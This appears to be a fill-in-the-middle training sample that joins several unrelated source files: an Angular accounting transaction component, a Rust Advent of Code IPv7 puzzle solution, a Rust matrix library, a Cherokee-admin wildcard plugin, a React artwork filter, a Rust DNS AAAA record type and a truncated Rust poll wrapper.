sTransactionDate: '',
transactionType: 0
};
this.transactionVisible = false;
this.calculateTransactionTotal = function () {
var i;
var total = 0;
for (i = 0; i < _this.transaction.transactionLineArray.length; i = i + 1) {
if (_this.transaction.transactionLineArray[i].debit) {
total += _this.transaction.transactionLineArray[i].amount;
}
else {
total -= _this.transaction.transactionLineArray[i].amount;
}
}
_this.transactionTotal = helper_service_1.HelperService.formatMoney(total);
};
this.newTransaction = function (ledgerAccounts, transactionType, bankAccounts) {
_this.selectedTransactionLineIndex = -1;
var newTransactionThis = _this;
if (helper_service_1.HelperService.tokenIsValid()) {
_this.ledgerAccounts = ledgerAccounts;
_this.bankAccounts = bankAccounts;
switch (transactionType) {
case 0:
_this.titleTransaction = 'Add Cheque';<|fim▁hole|> _this.titleTransaction = 'Add Deposit';
_this.bankAccountDisabled = false;
break;
case 4:
_this.titleTransaction = 'Add General Journal';
_this.bankAccountDisabled = true;
break;
}
var EntityId = GetEntity_service_1.GetEntityService.getInstance().getEntityId();
if (EntityId === -1) {
_this.router.navigate(['Entities']);
}
else {
_this.transaction = {
comment: '',
debtorID: -1,
entityID: EntityId,
transactionID: -1,
transactionLineArray: [],
bankAccountID: -1,
chequeNumber: -1,
sTransactionDate: helper_service_1.HelperService.formatDateForJSon(new Date()),
transactionType: transactionType
};
_this.gridOptions.api.setRowData(_this.transaction.transactionLineArray);
_this.selectedTransactionLineIndex = -1;
}
_this.editTransaction = false;
_this.getTransactionSuccess = true;
_this.calculateTransactionTotal();
_this.transactionVisible = true;
}
else {
_this.router.navigate(['Login']);
}
};
this.getTransaction = function (transactionID, ledgerAccounts, bankAccounts, copyTransaction) {
var getTransactionThis = _this;
getTransactionThis.editTransaction = !copyTransaction;
if (helper_service_1.HelperService.tokenIsValid()) {
_this.ledgerAccounts = ledgerAccounts;
_this.bankAccounts = bankAccounts;
var EntityId = GetEntity_service_1.GetEntityService.getInstance().getEntityId();
_this.transactionService.getTransaction(transactionID, EntityId).subscribe(onGetTransaction, logTransactionError);
}
else {
_this.router.navigate(['Login']);
}
function onGetTransaction(transaction) {
getTransactionThis.transaction = transaction;
getTransactionThis.gridOptions.api.setRowData(transaction.transactionLineArray);
getTransactionThis.gridOptions.api.sizeColumnsToFit();
            getTransactionThis.selectedTransactionLineIndex = -1;
getTransactionThis.getTransactionSuccess = true;
getTransactionThis.calculateTransactionTotal();
getTransactionThis.transactionVisible = true;
var verb;
if (copyTransaction) {
verb = 'Copy ';
}
else {
verb = 'Edit ';
}
switch (transaction.transactionType) {
case 0:
getTransactionThis.titleTransaction = verb + 'Cheque';
getTransactionThis.bankAccountDisabled = false;
break;
case 1:
                    getTransactionThis.titleTransaction = verb + 'Deposit';
getTransactionThis.bankAccountDisabled = false;
break;
case 4:
                    getTransactionThis.titleTransaction = verb + 'General Journal';
getTransactionThis.bankAccountDisabled = true;
break;
case 5:
                    getTransactionThis.titleTransaction = verb + 'Invoice';
getTransactionThis.bankAccountDisabled = true;
break;
case 6:
                    getTransactionThis.titleTransaction = verb + 'Pay Invoice';
getTransactionThis.bankAccountDisabled = true;
break;
}
}
function logTransactionError() {
console.log('getTransaction Error');
getTransactionThis.getTransactionSuccess = false;
}
};
this.cancelTransaction = function () {
_this.transactionVisible = false;
};
this.okClicked = function () {
var okClickedThis = _this;
if (_this.editTransaction) {
if (helper_service_1.HelperService.tokenIsValid()) {
_this.transactionService.updateTransaction(_this.transaction).subscribe(updateTransactionSuccess, logError, complete);
_this.transactionVisible = false;
}
else {
_this.router.navigate(['Login']);
}
}
else {
if (helper_service_1.HelperService.tokenIsValid()) {
_this.transactionService.saveNewTransaction(_this.transaction).subscribe(updateTransactionSuccess, logError, complete);
}
else {
_this.router.navigate(['Login']);
}
}
function logError(obj) {
console.log(obj);
console.log(JSON.stringify(obj));
}
function complete() {
console.log('transaction complete');
}
function updateTransactionSuccess(response) {
console.log('updateTransactionSuccess');
okClickedThis.transactionVisible = false;
okClickedThis.ok.emit('');
}
};
this.selectedTransactionLineIndex = -1;
this.deleteTransactionLine = function () {
if (_this.selectedTransactionLineIndex === -1) {
alert('Please choose a line to delete');
}
else {
_this.transaction.transactionLineArray.splice(_this.selectedTransactionLineIndex, 1);
_this.gridOptions.api.setRowData(_this.transaction.transactionLineArray);
_this.selectedTransactionLineIndex = -1;
}
};
        this.saveTransactionLine = function (savedTransactionLine) {
            if (_this.bEditTransactionLine) {
                _this.transaction.transactionLineArray[_this.selectedTransactionLineIndex] = savedTransactionLine;
            }
            else {
                _this.transaction.transactionLineArray.push(savedTransactionLine);
            }
_this.gridOptions.api.setRowData(_this.transaction.transactionLineArray);
_this.selectedTransactionLineIndex = -1;
_this.calculateTransactionTotal();
};
this.newTransactionLine = function () {
_this.bEditTransactionLine = false;
_this.transactionLineComponent.newTransactionLine(_this.ledgerAccounts, _this.transaction.transactionType);
};
this.columnDefs = [
{ headerName: 'Ledger Account', field: 'ledgerAccountName' },
{ headerName: 'Amount', field: 'amount', cellClass: 'rightJustify', cellRenderer: function (params) { return helper_service_1.HelperService.formatMoney(Number(params.value)); } },
{ headerName: 'Debit', field: 'debit' },
{ headerName: 'Comment', field: 'comment' }
];
this.onRowClicked = function (params) {
_this.selectedTransactionLineIndex = params.node.id;
};
this.onRowDoubleClicked = function (params) {
var selectedTransactionLine = params.data;
_this.bEditTransactionLine = true;
_this.transactionLineComponent.displayTransactionline(selectedTransactionLine, _this.ledgerAccounts, _this.transaction.transactionType);
};
this.gridOptions = helper_service_1.HelperService.getGridOptions(this.columnDefs, this.onRowClicked, this.onRowDoubleClicked);
console.log('constructor transactionComponent');
}
TransactionComponent.prototype.ngOnInit = function () {
if (helper_service_1.HelperService.tokenIsValid() === false) {
this.router.navigate(['Login']);
}
};
__decorate([
core_1.Output(),
__metadata('design:type', core_1.EventEmitter)
], TransactionComponent.prototype, "ok", void 0);
__decorate([
core_1.ViewChild(transactionline_component_1.TransactionLineComponent),
__metadata('design:type', transactionline_component_1.TransactionLineComponent)
], TransactionComponent.prototype, "transactionLineComponent", void 0);
TransactionComponent = __decorate([
core_1.Component({
selector: 'transactionModal',
templateUrl: 'src/app/components/transaction/transaction.component.html',
styles: ['.modalSolsofVisible {display: block;}'],
providers: [transaction_service_1.TransactionService],
directives: [main_1.AgGridNg2, transactionline_component_1.TransactionLineComponent]
}),
__metadata('design:paramtypes', [transaction_service_1.TransactionService, router_deprecated_1.Router])
], TransactionComponent);
return TransactionComponent;
}());
exports.TransactionComponent = TransactionComponent;
//# sourceMappingURL=Transaction.component.js.map<|fim▁end|>
|
_this.bankAccountDisabled = false;
break;
case 1:
|
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>// --- Day 7: Internet Protocol Version 7 ---
//
// While snooping around the local network of EBHQ, you compile a list of IP addresses (they're IPv7, of course; IPv6 is much too limited). You'd like to figure out which IPs support TLS (transport-layer snooping).
//
// An IP supports TLS if it has an Autonomous Bridge Bypass Annotation, or ABBA. An ABBA is any four-character sequence which consists of a pair of two different characters followed by the reverse of that pair, such as xyyx or abba. However, the IP also must not have an ABBA within any hypernet sequences, which are contained by square brackets.
//
// For example:
//
// abba[mnop]qrst supports TLS (abba outside square brackets).
// abcd[bddb]xyyx does not support TLS (bddb is within square brackets, even though xyyx is outside square brackets).<|fim▁hole|>// aaaa[qwer]tyui does not support TLS (aaaa is invalid; the interior characters must be different).
// ioxxoj[asdfgh]zxcvbn supports TLS (oxxo is outside square brackets, even though it's within a larger string).
// How many IPs in your puzzle input support TLS?
//
// --- Part Two ---
//
// You would also like to know which IPs support SSL (super-secret listening).
//
// An IP supports SSL if it has an Area-Broadcast Accessor, or ABA, anywhere in the supernet sequences (outside any square bracketed sections), and a corresponding Byte Allocation Block, or BAB, anywhere in the hypernet sequences. An ABA is any three-character sequence which consists of the same character twice with a different character between them, such as xyx or aba. A corresponding BAB is the same characters but in reversed positions: yxy and bab, respectively.
//
// For example:
//
// aba[bab]xyz supports SSL (aba outside square brackets with corresponding bab within square brackets).
// xyx[xyx]xyx does not support SSL (xyx, but no corresponding yxy).
// aaa[kek]eke supports SSL (eke in supernet with corresponding kek in hypernet; the aaa sequence is not related, because the interior character must be different).
// zazbz[bzb]cdb supports SSL (zaz has no corresponding aza, but zbz has a corresponding bzb, even though zaz and zbz overlap).
//
// How many IPs in your puzzle input support SSL?
//
extern crate regex;
#[macro_use]
extern crate lazy_static;
mod ip_address;
mod part_a_validator;
mod part_b_validator;
use std::io::prelude::*;
use std::fs::File;
use ip_address::IPAddress;
use part_a_validator::PartAValidator;
use part_b_validator::PartBValidator;
fn main() {
// read input from file
let mut f = File::open("input.txt").unwrap();
let mut input = String::new();
f.read_to_string(&mut input).ok();
// parse lines to IPAddress objects
let addresses: Vec<IPAddress> = input.lines().map(|l| l.parse().unwrap()).collect();
// figure out answer A
let part_a_validator = PartAValidator{};
let answer_a: Vec<&IPAddress> = addresses.iter().filter(|a| a.is_valid(&part_a_validator)).collect();
println!("[PART A] answer: {}", answer_a.len());
// figure out answer B
let part_b_validator = PartBValidator{};
let answer_b: Vec<&IPAddress> = addresses.iter().filter(|a| a.is_valid(&part_b_validator)).collect();
println!("[PART B] answer: {}", answer_b.len());
}<|fim▁end|>
| |
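// A hedged sketch of the ABBA rule described in the header comment; the real
// check lives in the unshown `part_a_validator` module, so this standalone
// helper is illustrative only.
fn has_abba(s: &str) -> bool {
    s.as_bytes()
        .windows(4)
        .any(|w| w[0] == w[3] && w[1] == w[2] && w[0] != w[1])
}

#[test]
fn abba_examples_from_the_puzzle() {
    assert!(has_abba("abba"));
    assert!(has_abba("ioxxoj"));
    assert!(!has_abba("aaaa"));
}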
<|file_name|>mat.rs<|end_file_name|><|fim▁begin|>use num::Float;
use std::fmt;
use std::ops::{Add, Sub, Mul};
use numvec::Vec3f;
/// The type of matrix elements.
pub type Scalar = f32;
/// A 4x4 matrix type stored in column-major order for interoperability with
/// OpenGL.
///
/// Supports the creation of isometries and projections in homogenous
/// coordinates. In terms of operations, only transposition and multiplication
/// are currently supported (and not super-efficiently implemented).
///
/// _Note:_ The 16 elements are stored in place, so copies are not cheap.
#[repr(packed)]
#[repr(C)]
#[derive(Copy, Clone)]
pub struct Mat4 {
data: [Scalar; 16]
}
impl Mat4 {
pub fn new(m00: Scalar, m01: Scalar, m02: Scalar, m03: Scalar,
m10: Scalar, m11: Scalar, m12: Scalar, m13: Scalar,
m20: Scalar, m21: Scalar, m22: Scalar, m23: Scalar,
m30: Scalar, m31: Scalar, m32: Scalar, m33: Scalar) -> Mat4 {
// In my mind vectors are columns, hence matrices need to be transposed
// to the OpenGL memory order.
Mat4 { data: [m00, m10, m20, m30, m01, m11, m21, m31,
m02, m12, m22, m32, m03, m13, m23, m33] }
}
pub fn new_identity() -> Mat4 {
Mat4::new(1.0, 0.0, 0.0, 0.0,
0.0, 1.0, 0.0, 0.0,
0.0, 0.0, 1.0, 0.0,
0.0, 0.0, 0.0, 1.0)
}
/// Creates a perspective projection matrix from.
///
/// The parameters are:
/// * `fov_degrees` - Horizontal field of view.
/// * `aspect_ratio` - Ratio between width and height of the view.
/// * `near`, `far` - The Z coordinate of the near and far planes.
pub fn new_perspective(fov_degrees: Scalar, aspect_ratio: Scalar,
near: Scalar, far: Scalar) -> Mat4 {
        let fov = fov_degrees.to_radians();
let f = 1.0 / (fov * 0.5).tan();
Mat4::new(
f / aspect_ratio, 0.0, 0.0, 0.0,
0.0, f, 0.0, 0.0,
0.0, 0.0, (far + near) / (near - far), 2.0*far*near / (near - far),
0.0, 0.0, -1.0, 0.0)
}
/// Creates a matrix which rotates points by `angle_radians` around `axis`.
pub fn new_axis_rotation(axis: &Vec3f, angle_radians: Scalar) -> Mat4 {
let ca = angle_radians.cos();
let sa = angle_radians.sin();
let nca = 1.0 - ca;
let u = axis;
Mat4::new(
ca + u.x*u.x*nca, u.x*u.y*nca - u.z*sa, u.x*u.z*nca + u.y*sa, 0.0,
u.y*u.x*nca + u.z*sa, ca + u.y*u.y*nca, u.y*u.z*nca - u.x*sa, 0.0,
u.z*u.x*nca - u.y*sa, u.z*u.y*nca + u.x*sa, ca + u.z*u.z*nca, 0.0,
0.0, 0.0, 0.0, 1.0
)
}
/// Creates a rotation matrix from the three _Euler angles_.
pub fn new_euler_rotation(yaw: f32, pitch: f32, roll: f32) -> Mat4 {
let (ca, sa) = (pitch.cos(), pitch.sin());
let (cb, sb) = (yaw.cos(), yaw.sin());
let (cc, sc) = (roll.cos(), roll.sin());
Mat4::new(
cb * cc, -cb * sc, sb, 0.0,
sa * sb * cc + ca * sc, -sa * sb * sc + ca * cc, -sa * cb, 0.0,
-ca * sb * cc + sa * sc, ca * sb * sc + sa * cc, ca * cb, 0.0,
0.0, 0.0, 0.0, 1.0)
}
/// Creates a translation matrix which maps points `p` to `p + by`.
pub fn new_translation(by: Vec3f) -> Mat4 {
Mat4::new(1.0, 0.0, 0.0, by.x,
0.0, 1.0, 0.0, by.y,
0.0, 0.0, 1.0, by.z,
0.0, 0.0, 0.0, 1.0)
}
/// Returns the transpose of the matrix (columns swapped with rows).
pub fn transposed(&self) -> Mat4 {
let m = &self.data;
// m is in column-major order, so calling with new in row-order will
// transpose it.
Mat4::new(m[0], m[1], m[2], m[3],
m[4], m[5], m[6], m[7],
m[8], m[9], m[10], m[11],
m[12], m[13], m[14], m[15])
}
pub fn get(&self, row: usize, column: usize) -> Scalar {
self.data[column * 4 + row]
}
pub fn as_scalar_ptr(&self) -> *const Scalar {
self.data.as_ptr()
}
pub fn approx_eq(&self, rhs: &Mat4, tol: Scalar) -> bool {
self.data.iter().zip(rhs.data.iter()).all(|(x, y)| (x - y).abs() <= tol)
}
}
impl fmt::Debug for Mat4 {
fn fmt(&self, formatter: &mut fmt::Formatter) -> fmt::Result {
write!(formatter,
"[{:10.3e} {:10.3e} {:10.3e} {:10.3e};\n\
{:10.3e} {:10.3e} {:10.3e} {:10.3e};\n\
{:10.3e} {:10.3e} {:10.3e} {:10.3e};\n\
{:10.3e} {:10.3e} {:10.3e} {:10.3e}]",
self.get(0, 0), self.get(0, 1), self.get(0, 2), self.get(0, 3),
self.get(1, 0), self.get(1, 1), self.get(1, 2), self.get(1, 3),
self.get(2, 0), self.get(2, 1), self.get(2, 2), self.get(2, 3),
self.get(3, 0), self.get(3, 1), self.get(3, 2), self.get(3, 3))
}
}
impl<'a, 'b> Mul<&'a Mat4> for &'b Mat4 {
type Output = Mat4;
fn mul(self, rhs: &'a Mat4) -> Mat4 {
let l = &self.data;
let r = &rhs.data;
Mat4 {
data: [l[0] * r[0] + l[4] * r[1] + l[8] * r[2] + l[12] * r[3],
l[1] * r[0] + l[5] * r[1] + l[9] * r[2] + l[13] * r[3],
l[2] * r[0] + l[6] * r[1] + l[10] * r[2] + l[14] * r[3],
l[3] * r[0] + l[7] * r[1] + l[11] * r[2] + l[15] * r[3],
l[0] * r[4] + l[4] * r[5] + l[8] * r[6] + l[12] * r[7],
l[1] * r[4] + l[5] * r[5] + l[9] * r[6] + l[13] * r[7],
l[2] * r[4] + l[6] * r[5] + l[10] * r[6] + l[14] * r[7],
l[3] * r[4] + l[7] * r[5] + l[11] * r[6] + l[15] * r[7],
l[0] * r[8] + l[4] * r[9] + l[ 8] * r[10] + l[12] * r[11],
l[1] * r[8] + l[5] * r[9] + l[ 9] * r[10] + l[13] * r[11],
l[2] * r[8] + l[6] * r[9] + l[10] * r[10] + l[14] * r[11],
l[3] * r[8] + l[7] * r[9] + l[11] * r[10] + l[15] * r[11],
l[0] * r[12] + l[4] * r[13] + l[ 8] * r[14] + l[12] * r[15],
l[1] * r[12] + l[5] * r[13] + l[ 9] * r[14] + l[13] * r[15],
l[2] * r[12] + l[6] * r[13] + l[10] * r[14] + l[14] * r[15],
l[3] * r[12] + l[7] * r[13] + l[11] * r[14] + l[15] * r[15]],
}
}
}
impl<'a, 'b> Add<&'a Mat4> for &'b Mat4 {
type Output = Mat4;
fn add(self, rhs: &'a Mat4) -> Mat4 {
let l = &self.data;
let r = &rhs.data;
Mat4 {
data: [l[0] + r[0], l[1] + r[1], l[2] + r[2], l[3] + r[3],
l[4] + r[4], l[5] + r[5], l[6] + r[6], l[7] + r[7],
l[8] + r[8], l[9] + r[9], l[10] + r[10], l[11] + r[11],
l[12] + r[12], l[13] + r[13], l[14] + r[14], l[15] + r[15]],
}
}
}
impl<'a, 'b> Sub<&'a Mat4> for &'b Mat4 {
type Output = Mat4;
fn sub(self, rhs: &'a Mat4) -> Mat4 {
let l = &self.data;
let r = &rhs.data;
Mat4 {
data: [l[0] - r[0], l[1] - r[1], l[2] - r[2], l[3] - r[3],
l[4] - r[4], l[5] - r[5], l[6] - r[6], l[7] - r[7],
l[8] - r[8], l[9] - r[9], l[10] - r[10], l[11] - r[11],
l[12] - r[12], l[13] - r[13], l[14] - r[14], l[15] - r[15]],
}
}
}
impl Mul<Mat4> for Mat4 {
type Output = Mat4;
fn mul(self, rhs: Mat4) -> Mat4 { &self * &rhs }
}
impl Add<Mat4> for Mat4 {
type Output = Mat4;
fn add(self, rhs: Mat4) -> Mat4 { &self + &rhs }
}
impl Sub<Mat4> for Mat4 {
type Output = Mat4;
fn sub(self, rhs: Mat4) -> Mat4 { &self - &rhs }
}<|fim▁hole|>
impl PartialEq for Mat4 {
fn eq(&self, rhs: &Mat4) -> bool {
self.data.iter().zip(rhs.data.iter()).all(|(x, y)| x == y)
}
}
#[cfg(test)]
mod test {
use super::Mat4;
#[test]
fn test_mul() {
let a = Mat4::new(4.0, 8.0, 1.0, 6.0,
9.0, 4.0, 2.0, 1.0,
4.0, 3.0, 9.0, 3.0,
2.0, 4.0, 9.0, 4.0);
let b = Mat4::new(8.0, 6.0, 5.0, 7.0,
1.0, 7.0, 3.0, 2.0,
1.0, 6.0, 7.0, 4.0,
2.0, 5.0, 2.0, 6.0);
let exp_ab = Mat4::new(53.0, 116.0, 63.0, 84.0,
80.0, 99.0, 73.0, 85.0,
50.0, 114.0, 98.0, 88.0,
37.0, 114.0, 93.0, 82.0);
assert_eq!(exp_ab, a * b);
}
}<|fim▁end|>
| |
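// A hedged usage sketch for `Mat4` (illustrative offsets; assumes
// `numvec::Vec3f` exposes a `new(x, y, z)` constructor, which is not shown
// in this file).
#[cfg(test)]
mod usage {
    use super::Mat4;
    use numvec::Vec3f;

    #[test]
    fn translation_fills_the_last_column() {
        let t = Mat4::new_translation(Vec3f::new(1.0, 2.0, 3.0));
        // Composing with the identity must leave the translation intact.
        let m = Mat4::new_identity() * t;
        assert_eq!(m.get(0, 3), 1.0);
        assert_eq!(m.get(1, 3), 2.0);
        assert_eq!(m.get(2, 3), 3.0);
    }
}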
<|file_name|>wildcard.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# Cheroke-admin
#
# Authors:
# Alvaro Lopez Ortega <[email protected]>
#
# Copyright (C) 2009-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
URL_APPLY = '/plugin/wildcard/apply'
NOTE_WILDCARD = N_("Accepted host name. Wildcard characters (* and ?) are allowed. Eg: *example.com")
WARNING_EMPTY = N_("At least one wildcard string must be defined.")
class Content (CTK.Container):
def __init__ (self, refreshable, key, url_apply, **kwargs):
CTK.Container.__init__ (self, **kwargs)
entries = CTK.cfg.keys (key)
# Warning message
if not entries:
notice = CTK.Notice('warning')
notice += CTK.RawHTML (_(WARNING_EMPTY))
self += notice
# List
else:
table = CTK.Table()
submit = CTK.Submitter(url_apply)
submit += table
self += CTK.Indenter(submit)
table.set_header(1)
table += [CTK.RawHTML(_('Domain pattern'))]
for i in entries:
e1 = CTK.TextCfg ("%s!%s"%(key,i))
rm = None
if len(entries) >= 2:
rm = CTK.ImageStock('del')
rm.bind('click', CTK.JS.Ajax (url_apply,
data = {"%s!%s"%(key,i): ''},
complete = refreshable.JS_to_refresh()))
table += [e1, rm]
# Add New
table = CTK.PropsTable()
next = CTK.cfg.get_next_entry_prefix (key)
table.Add (_('New host name'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_WILDCARD))
submit = CTK.Submitter(url_apply)
dialog = CTK.Dialog2Buttons ({'title': _('Add new entry')}, _('Add'), submit.JS_to_submit())
submit += table
submit.bind ('submit_success', refreshable.JS_to_refresh())
submit.bind ('submit_success', dialog.JS_to_close())
<|fim▁hole|> add_new = CTK.Button(_('Add New'))
add_new.bind ('click', dialog.JS_to_show())
self += add_new
class Plugin_wildcard (CTK.Plugin):
def __init__ (self, key, vsrv_num):
CTK.Plugin.__init__ (self, key)
pre = '%s!domain' %(key)
url_apply = '%s/%s' %(URL_APPLY, vsrv_num)
self += CTK.RawHTML ("<h2>%s</h2>" % (_('Accepted Domains')))
# Content
refresh = CTK.Refreshable ({'id': 'plugin_wildcard'})
refresh.register (lambda: Content(refresh, pre, url_apply).Render())
self += refresh
# Validation, and Public URLs
CTK.publish ('^%s/[\d]+$'%(URL_APPLY), CTK.cfg_apply_post, method="POST")<|fim▁end|>
|
dialog += submit
self += dialog
|
<|file_name|>ArtistSeriesArtworksFilter.tsx<|end_file_name|><|fim▁begin|>import { ArtistSeriesArtworksFilter_artistSeries } from "v2/__generated__/ArtistSeriesArtworksFilter_artistSeries.graphql"
import { BaseArtworkFilter } from "v2/Components/v2/ArtworkFilter"
import { ArtworkFilterContextProvider } from "v2/Components/v2/ArtworkFilter/ArtworkFilterContext"
import { updateUrl } from "v2/Components/v2/ArtworkFilter/Utils/urlBuilder"
import { Match, RouterState, withRouter } from "found"
import React from "react"
import { RelayRefetchProp, createRefetchContainer, graphql } from "react-relay"
interface ArtistSeriesArtworksFilterProps {
artistSeries: ArtistSeriesArtworksFilter_artistSeries
relay: RelayRefetchProp
match?: Match
}
const ArtistSeriesArtworksFilter: React.FC<ArtistSeriesArtworksFilterProps> = props => {
const { match, relay, artistSeries } = props
const { filtered_artworks } = artistSeries
const hasFilter = filtered_artworks && filtered_artworks.id
// If there was an error fetching the filter,
// we still want to render the rest of the page.
if (!hasFilter) return null
return (
<ArtworkFilterContextProvider
filters={match && match.location.query}
sortOptions={[
{ value: "-decayed_merch", text: "Default" },
{ value: "-has_price,-prices", text: "Price (desc.)" },
{ value: "-has_price,prices", text: "Price (asc.)" },
{ value: "-partner_updated_at", text: "Recently updated" },
{ value: "-published_at", text: "Recently added" },
{ value: "-year", text: "Artwork year (desc.)" },
{ value: "year", text: "Artwork year (asc.)" },
]}
onChange={updateUrl}
>
<BaseArtworkFilter
relay={relay}
viewer={artistSeries}
relayVariables={{
aggregations: ["TOTAL"],
}}
></BaseArtworkFilter>
</ArtworkFilterContextProvider>
)
}
export const ArtistSeriesArtworksFilterRefetchContainer = createRefetchContainer(
withRouter<ArtistSeriesArtworksFilterProps & RouterState>(
ArtistSeriesArtworksFilter
),
{
artistSeries: graphql`
fragment ArtistSeriesArtworksFilter_artistSeries on ArtistSeries
@argumentDefinitions(
acquireable: { type: "Boolean" }
aggregations: { type: "[ArtworkAggregation]" }
atAuction: { type: "Boolean" }
attributionClass: { type: "[String]" }
color: { type: "String" }
forSale: { type: "Boolean" }
height: { type: "String" }
inquireableOnly: { type: "Boolean" }
keyword: { type: "String" }
majorPeriods: { type: "[String]" }
medium: { type: "String", defaultValue: "*" }
offerable: { type: "Boolean" }
page: { type: "Int" }
partnerID: { type: "ID" }
priceRange: { type: "String" }
sizes: { type: "[ArtworkSizes]" }
sort: { type: "String", defaultValue: "-partner_updated_at" }
width: { type: "String" }
) {
filtered_artworks: filterArtworksConnection(
acquireable: $acquireable
aggregations: $aggregations
atAuction: $atAuction
attributionClass: $attributionClass
color: $color
forSale: $forSale
height: $height
inquireableOnly: $inquireableOnly
keyword: $keyword
majorPeriods: $majorPeriods
medium: $medium
offerable: $offerable
page: $page
partnerID: $partnerID
priceRange: $priceRange
sizes: $sizes
first: 20
after: ""
sort: $sort
width: $width
) {
id
...ArtworkFilterArtworkGrid2_filtered_artworks
}
}
`,
},
graphql`
query ArtistSeriesArtworksFilterQuery(
$acquireable: Boolean
$aggregations: [ArtworkAggregation] = [
MEDIUM
TOTAL
GALLERY
INSTITUTION
MAJOR_PERIOD
]
$slug: ID!
$atAuction: Boolean
$attributionClass: [String]
$color: String
$forSale: Boolean
$height: String
$inquireableOnly: Boolean
$keyword: String
$majorPeriods: [String]
$medium: String<|fim▁hole|> $partnerID: ID
$priceRange: String
$sizes: [ArtworkSizes]
$sort: String
$width: String
) {
artistSeries(id: $slug) {
...ArtistSeriesArtworksFilter_artistSeries
@arguments(
acquireable: $acquireable
aggregations: $aggregations
atAuction: $atAuction
attributionClass: $attributionClass
color: $color
forSale: $forSale
height: $height
inquireableOnly: $inquireableOnly
keyword: $keyword
majorPeriods: $majorPeriods
medium: $medium
offerable: $offerable
page: $page
partnerID: $partnerID
priceRange: $priceRange
sizes: $sizes
sort: $sort
width: $width
)
}
}
`
)<|fim▁end|>
|
$offerable: Boolean
$page: Int
|
<|file_name|>rfc3596.rs<|end_file_name|><|fim▁begin|>//! Record data from [RFC 3596].
//!
//! This RFC defines the Aaaa record type.
//!
//! [RFC 3596]: https://tools.ietf.org/html/rfc3596
use std::fmt;
use std::net::Ipv6Addr;
use std::str::FromStr;
use ::bits::{Composable, Composer, ComposeResult, DNameSlice, ParsedRecordData,
Parser, ParseResult, RecordData};
use ::iana::Rtype;
use ::master::{Scanner, ScanResult};
//------------ Aaaa ---------------------------------------------------------
#[derive(Clone, Debug, Eq, Ord, PartialEq, PartialOrd)]
pub struct Aaaa {
addr: Ipv6Addr
}
impl Aaaa {
pub fn new(addr: Ipv6Addr) -> Aaaa {
Aaaa { addr: addr }
}
pub fn addr(&self) -> Ipv6Addr { self.addr }
pub fn set_addr(&mut self, addr: Ipv6Addr) { self.addr = addr }
fn parse_always(parser: &mut Parser) -> ParseResult<Self> {
Ok(Aaaa::new(Ipv6Addr::new(try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()),
try!(parser.parse_u16()))))
}
pub fn scan<S: Scanner>(scanner: &mut S, _origin: Option<&DNameSlice>)
-> ScanResult<Self> {
scanner.scan_str_phrase(|slice| {
let addr = try!(Ipv6Addr::from_str(slice));
Ok(Aaaa::new(addr))
})
}
}
impl RecordData for Aaaa {
fn rtype(&self) -> Rtype { Rtype::Aaaa }
fn compose<C: AsMut<Composer>>(&self, mut target: C)
-> ComposeResult<()> {
for i in &self.addr.segments() {
try!(i.compose(target.as_mut()));
}
Ok(())
}
}
impl<'a> ParsedRecordData<'a> for Aaaa {
fn parse(rtype: Rtype, parser: &mut Parser) -> ParseResult<Option<Self>> {
if rtype == Rtype::Aaaa { Aaaa::parse_always(parser).map(Some) }
else { Ok(None) }
}<|fim▁hole|> fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
self.addr.fmt(f)
}
}<|fim▁end|>
|
}
impl fmt::Display for Aaaa {
|
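// A hedged usage sketch for the `Aaaa` record data: builds a record for the
// IPv6 loopback address using only the constructor and accessor above; the
// address choice is illustrative.
#[cfg(test)]
mod usage {
    use super::Aaaa;
    use std::net::Ipv6Addr;
    use std::str::FromStr;

    #[test]
    fn loopback_roundtrip() {
        let rdata = Aaaa::new(Ipv6Addr::from_str("::1").unwrap());
        assert_eq!(rdata.addr().to_string(), "::1");
    }
}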
<|file_name|>command.rs<|end_file_name|><|fim▁begin|>use irc_lib::client::data::Message;
pub enum Command {
Join {
channel: String,<|fim▁hole|> message: Option<String>,
},
PrivMsg {
target: String,
message: String,
},
Quit {
message: Option<String>,
},
MessageReceived(Message),
}<|fim▁end|>
|
},
Part {
channel: String,
|
<|file_name|>poll.rs<|end_file_name|><|fim▁begin|>#[cfg(any(target_os = "android", target_os = "dragonfly", target_os = "freebsd", target_os = "linux"))]
use sys::time::TimeSpec;
#[cfg(any(target_os = "android", target_os = "dragonfly", target_os = "freebsd", target_os = "linux"))]
use sys::signal::SigSet;
use std::os::unix::io::RawFd;
use libc;
use {Errno, Result};
/// This is a wrapper around `libc::pollfd`.
///
/// It's meant to be used as an argument to the [`poll`](fn.poll.html) and
/// [`ppoll`](fn.ppoll.html) functions to specify the events of interest
/// for a specific file descriptor.
///
/// After a call to `poll` or `ppoll`, the events that occured can be
/// retrieved by calling [`revents()`](#method.revents) on the `PollFd`.
#[repr(C)]
#[derive(Clone, Copy)]
pub struct PollFd {
pollfd: libc::pollfd,
}
impl PollFd {
/// Creates a new `PollFd` specifying the events of interest
/// for a given file descriptor.
pub fn new(fd: RawFd, events: EventFlags) -> PollFd {
PollFd {
pollfd: libc::pollfd {
fd: fd,
events: events.bits(),
revents: EventFlags::empty().bits(),
},
}
}
    /// Returns the events that occurred in the last call to `poll` or `ppoll`.
pub fn revents(&self) -> Option<EventFlags> {
EventFlags::from_bits(self.pollfd.revents)
}
}
libc_bitflags! {
/// These flags define the different events that can be monitored by `poll` and `ppoll`<|fim▁hole|> POLLIN;
/// There is some exceptional condition on the file descriptor.
///
/// Possibilities include:
///
/// * There is out-of-band data on a TCP socket (see
/// [tcp(7)](http://man7.org/linux/man-pages/man7/tcp.7.html)).
/// * A pseudoterminal master in packet mode has seen a state
/// change on the slave (see
